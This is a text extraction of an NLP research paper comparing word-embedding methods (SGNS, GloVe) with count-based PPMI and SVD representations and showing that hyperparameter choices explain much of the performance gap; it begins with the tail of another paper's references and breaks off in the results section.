Unsupervised resolution of objects and relations on the web. In Pro- ceedings of the 2007 Annual Conference of the North American Chapter of the Association for Computa- tional Linguistics. John M. Zelle and Raymond J. Mooney. 1996. Learning to parse database queries using inductive logic pro- gramming. In Proceedings of the thirteenth national conference on Artificial Intelligence. Luke S. Zettlemoyer and Michael Collins. 2005. Learn- ing to map sentences to logical form: structured clas- sification with probabilistic categorial grammars. In UAI ’05, Proceedings of the 21st Conference in Un- certainty in Artificial Intelligence. 270 work_ot7jvn6f25dqlag44iotnappoy ---- Improving Distributional Similarity with Lessons Learned from Word Embeddings Omer Levy Yoav Goldberg Ido Dagan Computer Science Department Bar-Ilan University Ramat-Gan, Israel {omerlevy,yogo,dagan}@cs.biu.ac.il Abstract Recent trends suggest that neural- network-inspired word embedding models outperform traditional count-based distri- butional models on word similarity and analogy detection tasks. We reveal that much of the performance gains of word embeddings are due to certain system design choices and hyperparameter op- timizations, rather than the embedding algorithms themselves. Furthermore, we show that these modifications can be transferred to traditional distributional models, yielding similar gains. In contrast to prior reports, we observe mostly local or insignificant performance differences between the methods, with no global advantage to any single approach over the others. 1 Introduction Understanding the meaning of a word is at the heart of natural language processing (NLP). While a deep, human-like, understanding remains elu- sive, many methods have been successful in recov- ering certain aspects of similarity between words. Recently, neural-network based approaches in which words are “embedded” into a low- dimensional space were proposed by various au- thors (Bengio et al., 2003; Collobert and Weston, 2008). These models represent each word as a d- dimensional vector of real numbers, and vectors that are close to each other are shown to be se- mantically related. In particular, a sequence of pa- pers by Mikolov et al. (2013a; 2013b) culminated in the skip-gram with negative-sampling training method (SGNS): an efficient embedding algorithm that provides state-of-the-art results on various lin- guistic tasks. It was popularized via word2vec, a program for creating word embeddings. A recent study by Baroni et al. (2014) con- ducts a set of systematic experiments compar- ing word2vec embeddings to the more tradi- tional distributional methods, such as pointwise mutual information (PMI) matrices (see Turney and Pantel (2010) and Baroni and Lenci (2010) for comprehensive surveys). These results suggest that the new embedding methods consistently out- perform the traditional methods by a non-trivial margin on many similarity-oriented tasks. How- ever, state-of-the-art embedding methods are all based on the same bag-of-contexts representation of words. Furthermore, analysis by Levy and Goldberg (2014c) shows that word2vec’s SGNS is implicitly factorizing a word-context PMI ma- trix. That is, the mathematical objective and the sources of information available to SGNS are in fact very similar to those employed by the more traditional methods. What, then, is the source of superiority (or per- ceived superiority) of these recent embeddings? While the focus of the presentation in the word- embedding literature is on the mathematical model and the objective being optimized, other factors af- fect the results as well. In particular, embedding algorithms suggest some natural hyperparameters that can be tuned; many of which were already tuned to some extent by the algorithms’ design- ers. Some hyperparameters, such as the number of negative samples to use, are clearly marked as tunable. Other modifications, such as smoothing the negative-sampling distribution, are reported in passing and considered thereafter as part of the al- gorithm. Others still, such as dynamically-sized context windows, are not even mentioned in some of the papers, but are part of the canonical imple- mentation. All of these modifications and system design choices, which we collectively denote as hyperparameters, are part of the final algorithm, and, as we show, have a substantial impact on per- formance. In this work, we make these hyperparameters explicit, and show how they can be adapted and transferred into the traditional count-based ap- proach. To asses how each hyperparameter con- tributes to the algorithms’ performance, we con- duct a comprehensive set of experiments and com- pare four different representation methods, while controlling for the various hyperparameters. Once adapted across methods, hyperparameter tuning significantly improves performance in ev- ery task. In many cases, changing the setting of a single hyperparameter yields a greater increase in performance than switching to a better algorithm or training on a larger corpus. In particular, word2vec’s smoothing of the negative sampling distribution can be adapted to PPMI-based methods by introducing a novel, smoothed variant of the PMI association measure (see Section 3.2). Using this variant increases per- formance by over 3 points per task, on average. We suspect that this smoothing partially addresses the “Achilles’ heel” of PMI: its bias towards co- occurrences of rare words. We also show that when all methods are allowed to tune a similar set of hyperparameters, their per- formance is largely comparable. In fact, there is no consistent advantage to one algorithmic approach over another, a result that contradicts the claim that embeddings are superior to count-based methods. 2 Background We consider four word representation methods: the explicit PPMI matrix, SVD factorization of said matrix, SGNS, and GloVe. For historical reasons, we refer to PPMI and SVD as “count- based” representations, as opposed to SGNS and GloVe, which are often referred to as “neural” or “prediction-based” embeddings. All of these methods (as well as all other “skip-gram”-based embedding methods) are essentially bag-of-words models, in which the representation of each word reflects a weighted bag of context-words that co- occur with it. Such bag-of-word embedding mod- els were previously shown to perform as well as or better than more complex embedding methods on similarity and analogy tasks (Mikolov et al., 2013a; Pennington et al., 2014). Notation We assume a collection of words w ∈ VW and their contexts c ∈ VC, where VW and VC are the word and context vocabularies, and denote the collection of observed word-context pairs as D. We use #(w,c) to denote the number of times the pair (w,c) appears in D. Similarly, #(w) =∑ c′∈VC #(w,c ′) and #(c) = ∑ w′∈VW #(w ′,c) are the number of times w and c occurred in D, respectively. In some algorithms, words and con- texts are embedded in a space of d dimensions. In these cases, each word w ∈ VW is associated with a vector ~w ∈ Rd and similarly each con- text c ∈ VC is represented as a vector ~c ∈ Rd. We sometimes refer to the vectors ~w as rows in a |VW |×d matrix W , and to the vectors ~c as rows in a |VC|×d matrix C. When referring to embed- dings produced by a specific method x, we may use Wx and Cx (e.g. WSGNS or CSV D). All vec- tors are normalized to unit length before they are used for similarity calculation, making cosine sim- ilarity and dot-product equivalent (see Section 3.3 for further discussion). Contexts D is commonly obtained by taking a corpus w1,w2, . . . ,wn and defining the contexts of word wi as the words surrounding it in an L- sized window wi−L, . . . ,wi−1,wi+1, . . . ,wi+L. While other definitions of contexts have been stud- ied (Padó and Lapata, 2007; Baroni and Lenci, 2010; Levy and Goldberg, 2014a) this work fo- cuses on fixed-window bag-of-words contexts. 2.1 Explicit Representations (PPMI Matrix) The traditional way to represent words in the distributional approach is to construct a high- dimensional sparse matrix M, where each row represents a word w in the vocabulary VW and each column a potential context c ∈ VC. The value of each matrix cell Mij represents the association between the word wi and the context cj. A popular measure of this association is pointwise mutual in- formation (PMI) (Church and Hanks, 1990). PMI is defined as the log ratio between w and c’s joint probability and the product of their marginal prob- abilities, which can be estimated by: PMI(w,c) = log P̂(w,c) P̂(w)P̂(c) = log #(w,c)·|D| #(w)·#(c) The rows of MPMI contain many entries of word- context pairs (w,c) that were never observed in the corpus, for which PMI(w,c) = log 0 = −∞. A common approach is thus to replace the MPMI matrix with MPMI0 , in which PMI(w,c) = 0 in cases where #(w,c) = 0. A more consistent ap- proach is to use positive PMI (PPMI), in which all negative values are replaced by 0: PPMI(w,c) = max (PMI (w,c) , 0) Bullinaria and Levy (2007) showed that MPPMI outperforms MPMI0 on semantic similarity tasks. A well-known shortcoming of PMI, which per- sists in PPMI, is its bias towards infrequent events (Turney and Pantel, 2010). A rare context c that co-occurred with a target word w even once, will often yield relatively high PMI score because P̂(c), which is in PMI’s denominator, is very small. This creates a situation in which the top “distributional features” (contexts) of w are often extremely rare words, which do not necessarily appear in the respective representations of words that are semantically similar to w. Nevertheless, the PPMI measure is widely regarded as state-of- the-art for these kinds of distributional-similarity models. 2.2 Singular Value Decomposition (SVD) While sparse vector representations work well, there are also advantages to working with dense low-dimensional vectors, such as improved com- putational efficiency and, arguably, better gener- alization. Such vectors can be obtained by per- forming dimensionality reduction over the sparse high-dimensional matrix. A common method of doing so is truncated Sin- gular Value Decomposition (SVD), which finds the optimal rank d factorization with respect to L2 loss (Eckart and Young, 1936). It was popular- ized in NLP via Latent Semantic Analysis (LSA) (Deerwester et al., 1990). SVD factorizes M into the product of three ma- trices U · Σ · V >, where U and V are orthonor- mal and Σ is a diagonal matrix of eigenvalues in decreasing order. By keeping only the top d ele- ments of Σ, we obtain Md = Ud · Σd · V >d . The dot-products between the rows of W = Ud·Σd are equal to the dot-products between rows of Md. In the setting of word-context matrices, the dense, d-dimensional rows of W can substitute the very high-dimensional rows of M. Indeed, a com- mon approach in NLP literature is factorizing the PPMI matrix MPPMI with SVD, and then taking the rows of: W SVD = Ud · Σd CSVD = Vd (1) as word and context representations, respectively. 2.3 Skip-Grams with Negative Sampling (SGNS) We present a brief sketch of SGNS – the skip-gram embedding model introduced in (Mikolov et al., 2013a) trained using the negative-sampling proce- dure presented in (Mikolov et al., 2013b). A de- tailed derivation of SGNS is available in (Gold- berg and Levy, 2014). SGNS seeks to represent each word w ∈ VW and each context c ∈ VC as d-dimensional vec- tors ~w and ~c, such that words that are “similar” to each other will have similar vector representa- tions. It does so by trying to maximize a function of the product ~w ·~c for (w,c) pairs that occur in D, and minimize it for negative examples: (w,cN ) pairs that do not necessarily occur in D. The neg- ative examples are created by stochastically cor- rupting observed (w,c) pairs from D – hence the name “negative sampling”. For each observation of (w,c), SGNS draws k contexts from the em- pirical unigram distribution PD(c) = #(c) |D| . In word2vec’s implementation of SGNS, this dis- tribution is smoothed, a design choice that boosts its performance. We explore this hyperparameter and others in Section 3. SGNS as Implicit Matrix Factorization Levy and Golberg (2014c) show that SGNS’s corpus- level objective achieves its optimal value when: ~w ·~c = PMI(w,c) − log k Hence, SGNS is implicitly factorizing a word- context matrix whose cell’s values are PMI, shifted by a global constant (log k): W ·C> = MPMI − log k SGNS performs a different kind of factorization from traditional SVD (see 2.2). In particular, the factorization’s loss function is not based on L2, and is much less sensitive to extreme and infi- nite values due to a sigmoid function surrounding ~w · ~c. Furthermore, the loss is weighted, caus- ing rare (w,c) pairs to affect the objective much less than frequent ones. Thus, while many cells in MPMI equal log 0 = −∞, the cost incurred for re- constructing these cells as a small negative value, such as −5 instead of as −∞, is negligible.1 1The logistic (sigmoidal) objective also curbs very high positive values of PMI. We suspect that this property, along with the weighted factorization property, addresses the afore- mentioned shortcoming of PMI, i.e. its overweighting of in- frequent events. An additional difference from SVD, which will be explored further in Section 3.3, is that SVD factorizes M into three matrices, two of them or- thonormal and one diagonal, while SGNS factor- izes M into two unconstrained matrices. 2.4 Global Vectors (GloVe) GloVe (Pennington et al., 2014) seeks to represent each word w ∈ VW and each context c ∈ VC as d-dimensional vectors ~w and ~c such that: ~w ·~c + bw + bc = log (#(w,c)) ∀(w,c) ∈ D Here, bw and bc (scalars) are word/context-specific biases, and are also parameters to be learned in addition to ~w and ~c. GloVe’s objective is explicitly defined as a fac- torization of the log-count matrix, shifted by the entire vocabularies’ bias terms: M log(#(w,c)) ≈ W ·C> + ~bw + ~bc Where ~bw is a |VW | dimensional row vector and ~bc is a |VC| dimensional column vector. If we were to fix bw = log #(w) and bc = log #(c), this would be almost2 equivalent to fac- torizing the PMI matrix shifted by log(|D|). How- ever, GloVe learns these parameters, giving an ex- tra degree of freedom over SVD and SGNS. The model is fit to minimize a weighted least square loss, giving more weight to frequent (w,c) pairs.3 Finally, an important novelty introduced in (Pennington et al., 2014) is that, assuming VC = VW , one could take the representation of a word w to be ~w + ~cw where ~cw is the row correspond- ing to w in C>. This may improve results con- siderably in some circumstances, as we discuss in Sections 3.3 and 6.2. 3 Transferable Hyperparameters This section presents various hyperparameters im- plemented in word2vec and GloVe, and shows how to adapt and apply them to count-based methods. We divide these into: pre-processing hyperparameters, which affect the algorithms’ input data; association metric hyperparameters, which define how word-context interactions are calculated; and post-processing hyperparameters, which modify the resulting word vectors. 2GloVe’s objective ignores (w, c) pairs that do not co- occur in the training corpus, treating them as missing values. SGNS, on the other hand, does take such pairs into account through the negative sampling procedure. 3The weighting formula is another hyper-parameter that could be tuned, but we keep to the default weighting scheme. 3.1 Pre-processing Hyperparameters All the matrix-based algorithms rely on a col- lection D of word-context pairs (w,c) as inputs. word2vec introduces three novel variations on the way D is collected, which can be easily ap- plied to other methods beyond SGNS. Dynamic Context Window (dyn) The tradi- tional approaches usually use a constant-sized un- weighted context window. For instance, if the win- dow size is 5, then a word five tokens apart from the target is treated the same as an adjacent word. Following the intuition that contexts closer to the target are more important, context words can be weighted according to their distance from the fo- cus word. Both GloVe and word2vec employ such a weighting scheme, and while less com- mon, this approach was also explored in tradi- tional count-based methods, e.g. (Sahlgren, 2006). GloVe’s implementation weights contexts using the harmonic function, e.g. a context word three tokens away will be counted as 1 3 of an occurrence. On the other hand, word2vec’s implementation is equivalent to weighing by the distance from the focus word divided by the window size. For ex- ample, a size-5 window will weigh its contexts by 5 5 , 4 5 , 3 5 , 2 5 , 1 5 . The reason we call this modification dynamic context windows is because word2vec imple- ments its weighting scheme by uniformly sam- pling the actual window size between 1 and L, for each token (Mikolov et al., 2013a). The sampling method is faster than the direct method in terms of training time, since there are fewer SGD updates in SGNS and fewer non-zero matrix cells in the other methods. For our systematic experiments, we used the word2vec-style sampled version for all methods, including GloVe. Subsampling (sub) Subsampling is a method of diluting very frequent words, akin to removing stop-words. The subsampling method presented in (Mikolov et al., 2013a) randomly removes words that are more frequent than some threshold t with a probability of p, where f marks the word’s corpus frequency: p = 1 − √ t f (2) Following the recommendation in (Mikolov et al., 2013a), we use t = 10−5 in our experiments.4 4word2vec’s code implements a slightly different for- mula: p = f−t f − √ t f . We followed the formula presented Another implementation detail of subsampling in word2vec is that the removal of tokens is done before the corpus is processed into word- context pairs. This practically enlarges the con- text window’s size for many tokens, because they can now reach words that were not in their origi- nal L-sized windows. We call this kind of subsam- pling “dirty”, as opposed to “clean” subsampling, which removes subsampled words without affect- ing the context window’s size. We found their im- pact on performance comparable, and report re- sults of only the “dirty” variant. Deleting Rare Words (del) While it is com- mon to ignore words that are rare in the training corpus, word2vec removes these tokens from the corpus before creating context windows. As with subsampling, this variation narrows the dis- tance between tokens, inserting new word-context pairs that did not exist in the original corpus with the same window size. Though this variation may also have an effect on performance, preliminary experiments showed that it was small, and we therefore do not investigate its effect in this paper. 3.2 Association Metric Hyperparameters The PMI (or PPMI) between a word and its con- text is well known to be an effective association measure in the word similarity literature. Levy and Golberg (2014c) show that SGNS is implicitly fac- torizing a word-context matrix whose cell’s val- ues are shifted PMI. Following their analysis, we present two variations of the PMI (and implicitly PPMI) association metric, which we adopt from SGNS. These enhancements of PMI are not di- rectly applicable to GloVe, which, by definition, uses a different association measure. Shifted PMI (neg) SGNS has a natural hyper- parameter k (the number of negative samples), which affects the value that SGNS is trying to op- timize for each (w,c): PMI(w,c) − log k. The shift caused by k > 1 can be applied to distri- butional methods through shifted PPMI (Levy and Goldberg, 2014c): SPPMI(w,c) = max (PMI (w,c) − log k, 0) It is important to understand that in SGNS, k has two distinct functions. First, it is used to better estimate the distribution of negative examples; a higher k means more data and better estimation. in the original paper (equation 2). Second, it acts as a prior on the probability of ob- serving a positive example (an actual occurrence of (w,c) in the corpus) versus a negative example; a higher k means that negative examples are more probable. Shifted PPMI captures only the second aspect of k (a prior). We experiment with three values of k: 1, 5, 15. Context Distribution Smoothing (cds) In word2vec, negative examples (contexts) are sampled according to a smoothed unigram dis- tribution. In order to smooth the original con- texts’ distribution, all context counts are raised to the power of α (Mikolov et al. (2013b) found α = 0.75 to work well). This smoothing varia- tion has an analog when calculating PMI directly: PMIα (w,c) = log P̂(w,c) P̂(w)P̂α(c) (3) P̂α(c) = # (c) α∑ c # (c) α Like other smoothing techniques (Pantel and Lin, 2002; Turney and Littman, 2003), context distri- bution smoothing alleviates PMI’s bias towards rare words. It does so by enlarging the probability of sampling a rare context (since P̂α(c) > P̂(c) when c is infrequent), which in turn reduces the PMI of (w,c) for any w co-occurring with the rare context c. In Section 6.2 we demonstrate that this novel variant of PMI is very effective, and consis- tently improves performance across tasks, meth- ods, and configurations. We experiment with two values of α: 1 (unsmoothed) and 0.75 (smoothed). 3.3 Post-processing Hyperparameters We present three hyperparameters that modify the algorithms’ output: the word vectors. Adding Context Vectors (w+c) Pennington et al. (2014) propose using the context vectors in ad- dition to the word vectors as GloVe’s output. For example, the word “cat” can be represented as: ~vcat = ~wcat + ~ccat where ~w and ~c are the word and context embed- dings, respectively. This vector combination was originally moti- vated as an ensemble method. Here, we provide a different interpretation of its effect on the co- sine similarity function. Specifically, we show that adding context vectors effectively adds first- order similarity terms to the second-order similar- ity function. Consider the cosine similarity of two words: cos(x,y) = ~vx ·~vy√ ~vx ·~vx √ ~vy ·~vy = (~wx + ~cx) · (~wy + ~cy)√ (~wx + ~cx) · (~wx + ~cx) √ (~wy + ~cy) · (~wy + ~cy) = ~wx · ~wy + ~cx ·~cy + ~wx ·~cy + ~cx · ~wy√ ~w2x + 2~wx ·~cx + ~c2x √ ~w2y + 2~wy ·~cy + ~c2y = ~wx · ~wy + ~cx ·~cy + ~wx ·~cy + ~cx · ~wy 2 √ ~wx ·~cx + 1 √ ~wy ·~cy + 1 (4) (The last step follows because, as noted in Sec- tion 2, the word and context vectors are normal- ized after training.) The resulting expression combines similarity terms which can be divided into two groups: second-order similarity (wx ·wy, cx ·cy) and first- order similarity (w∗ · c∗). The second-order terms measure the extent to which the two words are re- placeable based on their tendencies to appear in similar contexts, and are the manifestation of Har- ris’s (1954) distributional hypothesis. The first- order terms measure the tendency of one word to appear in the context of the other. In SVD and SGNS, the first-order similarity terms between w and c converge to PMI(w,c), while in GloVe it converges into their log-count (with some bias terms). The similarity calculated in equation 4 is thus a symmetric combination of the first-order and sec- ond order similarities of x and y, normalized by a function of their reflective first-order similarities: sim(x,y) = sim2(x,y) + sim1(x,y)√ sim1(x,x) + 1 √ sim1(y,y) + 1 This similarity measure states that words are similar if they tend to appear in similar contexts, or if they tend to appear in the contexts of each other (and preferably both). The additive w+c representation can be triv- ially applied to other methods that produce distinct word and context vectors (e.g. SVD and SGNS). On the other hand, explicit methods such as PPMI are sparse by definition, and nullify the vast ma- jority of first-order similarities. We therefore do not apply w+c to PPMI in this study. Eigenvalue Weighting (eig) As mentioned in Section 2.2, the word and context vectors derived using SVD are typically represented by (equa- tion 1): W SVD = Ud · Σd CSVD = Vd However, this is not necessarily the optimal con- struction of W SVD for word similarity tasks. We note that in the SVD-based factorization, the re- sulting word and context matrices have very dif- ferent properties. In particular, the context ma- trix CSVD is orthonormal while the word matrix W SVD is not. On the other hand, the factorization achieved by SGNS’s training procedure is much more “symmetric”, in the sense that neither W W2V nor CW2V is orthonormal, and no particular bias is given to either of the matrices in the training ob- jective. Similar symmetry can be achieved with the following factorization: W = Ud · √ Σd C = Vd · √ Σd (5) Alternatively, the eigenvalue matrix can be dis- missed altogether: W = Ud C = Vd (6) While it is not theoretically clear why the symmetric approach is better for semantic tasks, it does work much better empirically (see Sec- tion 6.1). A similar observation was made by Caron (2001), who suggested adding a parameter p to control the eigenvalue matrix Σ: W SVDp = Ud · Σ p d Later studies show that weighting the eigenvalue matrix Σd with the exponent p can have a signif- icant effect on performance, and should be tuned (Bullinaria and Levy, 2012; Turney, 2012). Adapt- ing the notion of symmetric decomposition from SGNS, this study experiments only with symmet- ric variants of SVD (p = 0, p = 0.5; equations (6) and (5)) and the traditional factorization (p = 1; equation (1)). Vector Normalization (nrm) As mentioned in Section 2, all vectors (i.e. W ’s rows) are normal- ized to unit length (L2 normalization), rendering the dot product operation equivalent to cosine sim- ilarity. This normalization is a hyperparameter set- ting in itself, and other normalizations are also ap- plicable. The trivial case is using no normalization Hyper- Explored Applicable parameter Values Methods win 2, 5, 10 All dyn none, with All sub none, dirty, clean† All del none, with† All neg 1, 5, 15 PPMI, SVD, SGNS cds 1, 0.75 PPMI, SVD, SGNS w+c only w, w + c SVD, SGNS, GloVe eig 0, 0.5, 1 SVD nrm none†, row, col†, both† All Table 1: The space of hyperparameters explored in this work. †Explored only in preliminary experiments. at all. Another setting, used by Pennington et al. (2014), normalizes the columns of W rather than its rows. It is also possible to consider a fourth setting that combines both row and column nor- malizations. Note that column normalization is akin to dis- missing the eigenvalues in SVD. While the hy- perparameter setting eig = 0 has an important positive impact on SVD, the same cannot be said of column normalization on other methods. In preliminary experiments, we tried the four differ- ent normalization schemes described above (none, row, column, and both), and found the standard L2 normalization of W ’s rows (i.e. using the cosine similarity measure) to be consistently superior. 4 Experimental Setup We explored a large space of hyperparameters, representations, and evaluation datasets. 4.1 Hyperparameter Space Table 1 enumerates the hyperparameter space. We generated 72 PPMI, 432 SVD, 144 SGNS, and 24 GloVe representations; 672 overall. 4.2 Word Representations Corpus All models were trained on English Wikipedia (August 2013 dump), pre-processed by removing non-textual elements, sentence splitting, and tokenization. The corpus contains 77.5 mil- lion sentences, spanning 1.5 billion tokens. Mod- els were derived using windows of 2, 5, and 10 tokens to each side of the focus word (the window size parameter is denoted win). Words that ap- peared less than 100 times in the corpus were ig- nored, resulting in vocabularies of 189,533 terms for both words and contexts. Training Embeddings We trained a 500- dimensional representation with SVD, SGNS, and GloVe. SGNS was trained using a modified ver- sion of word2vec which receives a sequence of pre-extracted word-context pairs (Levy and Gold- berg, 2014a). GloVe was trained with 50 itera- tions using the original implementation (Penning- ton et al., 2014), applied to the pre-extracted word- context pairs. 4.3 Test Datasets We evaluated each word representation on eight datasets covering similarity and analogy tasks. Word Similarity We used six datasets to eval- uate word similarity: the popular WordSim353 (Finkelstein et al., 2002) partitioned into two datasets, WordSim Similarity and WordSim Relat- edness (Zesch et al., 2008; Agirre et al., 2009); Bruni et al.’s (2012) MEN dataset; Radinsky et al.’s (2011) Mechanical Turk dataset; Luong et al.’s (2013) Rare Words dataset; and Hill et al.’s (2014) SimLex-999 dataset. All these datasets con- tain word pairs together with human-assigned sim- ilarity scores. The word vectors are evaluated by ranking the pairs according to their cosine similar- ities, and measuring the correlation (Spearman’s ρ) with the human ratings. Analogy The two analogy datasets present ques- tions of the form “a is to a∗ as b is to b∗”, where b∗ is hidden, and must be guessed from the entire vocabulary. MSR’s analogy dataset (Mikolov et al., 2013c) contains 8000 morpho-syntactic anal- ogy questions, such as “good is to best as smart is to smartest”. Google’s analogy dataset (Mikolov et al., 2013a) contains 19544 questions, about half of the same kind as in MSR (syntactic analogies), and another half of a more semantic nature, such as capital cities (“Paris is to France as Tokyo is to Japan”). After filtering questions involving out- of-vocabulary words, i.e. words that appeared in English Wikipedia less than 100 times, we remain with 7118 instances in MSR and 19258 instances in Google. The analogy questions are answered using 3CosAdd (addition and subtraction): arg max b∗∈VW\{a∗,b,a} cos(b∗,a∗ −a + b) = arg max b∗∈VW\{a∗,b,a} (cos(b∗,a∗) − cos(b∗,a) + cos(b∗,b)) as well as 3CosMul, which is state-of-the-art in analogy recovery (Levy and Goldberg, 2014b): arg max b∗∈VW\{a∗,b,a} cos(b∗,a∗) · cos(b∗,b) cos(b∗,a) + ε Method WordSim WordSim Bruni et al. Radinsky et al. Luong et al. Hill et al. Google MSR Similarity Relatedness MEN M. Turk Rare Words SimLex Add / Mul Add / Mul PPMI .709 .540 .688 .648 .393 .338 .491 / .650 .246 / .439 SVD .776 .658 .752 .557 .506 .422 .452 / .498 .357 / .412 SGNS .724 .587 .686 .678 .434 .401 .530 / .552 .578 / .592 GloVe .666 .467 .659 .599 .403 .398 .442 / .465 .529 / .576 Table 2: Performance of each method across different tasks in the “vanilla” scenario (all hyperparameters set to default): win = 2; dyn = none; sub = none; neg = 1; cds = 1; w+c = only w; eig = 0.0. Method WordSim WordSim Bruni et al. Radinsky et al. Luong et al. Hill et al. Google MSR Similarity Relatedness MEN M. Turk Rare Words SimLex Add / Mul Add / Mul PPMI .755 .688 .745 .686 .423 .354 .553 / .629 .289 / .413 SVD .784 .672 .777 .625 .514 .402 .547 / .587 .402 / .457 SGNS .773 .623 .723 .676 .431 .423 .599 / .625 .514 / .546 GloVe .667 .506 .685 .599 .372 .389 .539 / .563 .503 / .559 CBOW .766 .613 .757 .663 .480 .412 .547 / .591 .557 / .598 Table 3: Performance of each method across different tasks using word2vec’s recommended configuration: win = 2; dyn = with; sub = dirty; neg = 5; cds = 0.75; w+c = only w; eig = 0.0. CBOW is presented for comparison. Method WordSim WordSim Bruni et al. Radinsky et al. Luong et al. Hill et al. Google MSR Similarity Relatedness MEN M. Turk Rare Words SimLex Add / Mul Add / Mul PPMI .755 .697 .745 .686 .462 .393 .553 / .679 .306 / .535 SVD .793 .691 .778 .666 .514 .432 .554 / .591 .408 / .468 SGNS .793 .685 .774 .693 .470 .438 .676 / .688 .618 / .645 GloVe .725 .604 .729 .632 .403 .398 .569 / .596 .533 / .580 Table 4: Performance of each method across different tasks using the best configuration for that method and task combination, assuming win = 2. ε = 0.001 is used to prevent division by zero. We abbreviate the two methods “Add” and “Mul”, re- spectively. The evaluation metric for the analogy questions is the percentage of questions for which the argmax result was the correct answer (b∗). 5 Results We begin by comparing the effect of various hy- perparameter configurations, and observe that dif- ferent settings have a substantial impact on per- formance (Section 5.1); at times, this improve- ment is greater than that of switching to a dif- ferent representation method. We then show that, in some tasks, careful hyperparameter tuning can also outweigh the importance of adding more data (5.2). Finally, we observe that our results do not agree with a few recent claims in the word embed- ding literature, and suggest that these discrepan- cies stem from hyperparameter settings that were not controlled for in previous experiments (5.3). 5.1 Hyperparameters vs Algorithms We first examine a “vanilla” scenario (Table 2), in which all hyperparameters are “turned off” (set to default values): small context windows (win = 2), no dynamic contexts (dyn = none), no sub- sampling (sub = none), one negative sample (neg = 1), no smoothing (cds = 1), no context vectors (w+c = only w), and default eigenvalue weights (eig = 0.0).5 Overall, SVD outperforms other methods on most word similarity tasks, often having a considerable advantage over the second- best. In contrast, analogy tasks present mixed re- sults; SGNS yields the best result in MSR’s analo- gies, while PPMI dominates Google’s dataset. The second scenario (Table 3) sets the hyper- parameters to word2vec’s default values: small context windows (win = 2),6 dynamic contexts (dyn = with), dirty subsampling (sub = dirty), five negative samples (neg = 5), context distribu- tion smoothing (cds = 0.75), no context vectors (w+c = only w), and default eigenvalue weights 5While it is more common to set eig = 1, this setting degrades SVD’s performance considerably (see Section 6.1). 6While word2vec’s default window size is 5, we present a single window size (win = 2) in Tables 2-4, in order to iso- late win’s effect from the effects of other hyperparameters. Running the same experiments with different window sizes reveals similar trends. Additional results with broader win- dow sizes are shown in Table 5. win Method WordSim WordSim Bruni et al. Radinsky et al. Luong et al. Hill et al. Google MSR Similarity Relatedness MEN M. Turk Rare Words SimLex Add / Mul Add / Mul 2 PPMI .732 .699 .744 .654 .457 .382 .552 / .677 .306 / .535 SVD .772 .671 .777 .647 .508 .425 .554 / .591 .408 / .468 SGNS .789 .675 .773 .661 .449 .433 .676 / .689 .617 / .644 GloVe .720 .605 .728 .606 .389 .388 .649 / .666 .540 / .591 5 PPMI .732 .706 .738 .668 .442 .360 .518 / .649 .277 / .467 SVD .764 .679 .776 .639 .499 .416 .532 / .569 .369 / .424 SGNS .772 .690 .772 .663 .454 .403 .692 / .714 .605 / .645 GloVe .745 .617 .746 .631 .416 .389 .700 / .712 .541 / .599 10 PPMI .735 .701 .741 .663 .235 .336 .532 / .605 .249 / .353 SVD .766 .681 .770 .628 .312 .419 .526 / .562 .356 / .406 SGNS .794 .700 .775 .678 .281 .422 .694 / .710 .520 / .557 GloVe .746 .643 .754 .616 .266 .375 .702 / .712 .463 / .519 10 SGNS-LS .766 .681 .781 .689 .451 .414 .739 / .758 .690 / .729 GloVe-LS .678 .624 .752 .639 .361 .371 .732 / .750 .628 / .685 Table 5: Performance of each method across different tasks using 2-fold cross-validation for hyperparameter tuning. Configu- rations on large-scale (LS) corpora are also presented for comparison. (eig = 0.0). The results in this scenario are quite different than those of the vanilla scenario, with better performance in many cases. However, this change is not uniform, as we observe that differ- ent settings boost different algorithms. In fact, the question “Which method is best?” might have a completely different answer when comparing on the same task but with different hyperparameter values. Looking at Table 2 and Table 3, for ex- ample, SVD is the best algorithm for SimLex-999 in the vanilla scenario, whereas in the word2vec scenario, it does not perform as well as SGNS. The third scenario (Table 4) enables the full range of hyperparameters given small context win- dows (win = 2); we evaluate each method on each task given every hyperparameter configura- tion, and choose the best performance. We see a considerable performance increase across all methods when comparing to both the vanilla (Ta- ble 2) and word2vec scenarios (Table 3): the best combination of hyperparameters improves up to 15.7 points beyond the vanilla setting, and over 6 points on average. It appears that selecting the right hyperparameter settings often has more im- pact than choosing the most suitable algorithm. Main Result The numbers in Table 4 result from an “oracle” experiment, in which the hyperparam- eters are tuned on the test data, providing an upper bound on the potential performance improvement of hyperparameter tuning. Are such gains achiev- able in practice? Table 5 describes a realistic scenario, where the hyperparameters are tuned on a training set, which is separate from the unseen test data. We also report results for different window sizes (win = 2, 5, 10). We use 2-fold cross validation, in which, for each task, the hyperparameters are tuned on each half of the data and evaluated on the other half. The numbers reported in Table 5 are the av- erages of the two runs for each data-point. The results indicate that approaching the ora- cle’s improvements are indeed feasible. When comparing the performance of the trained config- uration (Table 5) to that of the optimal one (Ta- ble 4), their average difference is about 1%, with larger datasets usually finding the optimal configu- ration. It is therefore both practical and beneficial to properly tune hyperparameters for word simi- larity and analogy detection tasks. An interesting observation, which immediately appears when looking at Table 5, is that there is no single method that consistently performs better than the rest. This behavior is visible across all window sizes, and is discussed in further detail in Section 5.3. 5.2 Hyperparameters vs Big Data An important factor in evaluating distributional methods is the size of corpus and vocabulary, where larger corpora tend to yield better repre- sentations. However, training word vectors from larger corpora is more costly in computation time, which could be spent in tuning hyperparameters. To compare the effect of bigger data versus more flexible hyperparameter settings, we created a large corpus with over 10.5 billion words (7 times larger than our original corpus). This cor- pus was built from an 8.5 billion word corpus sug- gested by Mikolov for training word2vec,7 to which we added UKWaC (Ferraresi et al., 2008). As with the original setup, our vocabulary con- tained every word that appeared at least 100 times in the corpus, amounting to about 620,000 words. Finally, we fixed the context windows to be broad and dynamic (win = 10,dyn = with), and ex- plored 16 hyperparameter settings comprising of: subsampling (sub), shifted PMI (neg = 1, 5), context distribution smoothing (cds), and adding context vectors (w+c). This space is somewhat more restricted than the original hyperparameter space. In terms of computation, SGNS scales nicely, requiring about half a day of computation per setup. GloVe, on the other hand, took several days to run a single 50-iteration instance for this corpus. Applying the traditional count-based methods to this setting proved technically challenging, as they consumed too much memory to be efficiently ma- nipulated. We thus present results for only SGNS and GloVe (Table 5). Remarkably, there are some cases (3/6 word similarity tasks) in which tuning a larger space of hyperparameters is indeed more beneficial than expanding the corpus. In other cases, however, more data does seem to pay off, as evident with both analogy tasks. 5.3 Re-evaluating Prior Claims Prior art raises several claims regarding the superi- ority of certain methods over the others. However, these studies did not control for the hyperparame- ters presented in this work. We thus revisit these 